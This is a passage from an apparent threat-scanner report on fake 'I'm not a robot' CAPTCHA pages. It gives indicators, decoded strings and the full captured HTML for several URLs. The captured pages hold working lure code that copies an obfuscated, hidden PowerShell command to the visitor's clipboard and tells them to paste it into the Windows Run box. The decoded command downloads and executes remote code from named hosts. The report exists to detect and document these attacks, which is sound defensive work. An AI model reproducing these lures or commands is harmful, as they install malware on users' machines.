"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://mail.cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://browser.certif-update.website/ |
| URL | https://browser.certif-update.website/ |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://mail.cambodiatouristservice.com/",
"URLs": [
"https://browser.certif-update.website/",
"https://browser.certif-update.website/"
],
"HTML": "<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"refresh\" content=\"0; url=https://browser.certif-update.website/\">\r\n <script type=\"text/javascript\">\r\n window.location.href = \"https://browser.certif-update.website/\"\r\n </script>\r\n <title>Loading</title>\r\n </head>\r\n <body>\r\n\t </body>\r\n</html>",
"ThreatLevel": "None"
}
https://my.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://my.salviatech.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=",
"Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r",
"ClipboardCommands": "PowErsHeLL -W hiddEn ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
http://82.146.62.232/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "http://82.146.62.232/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
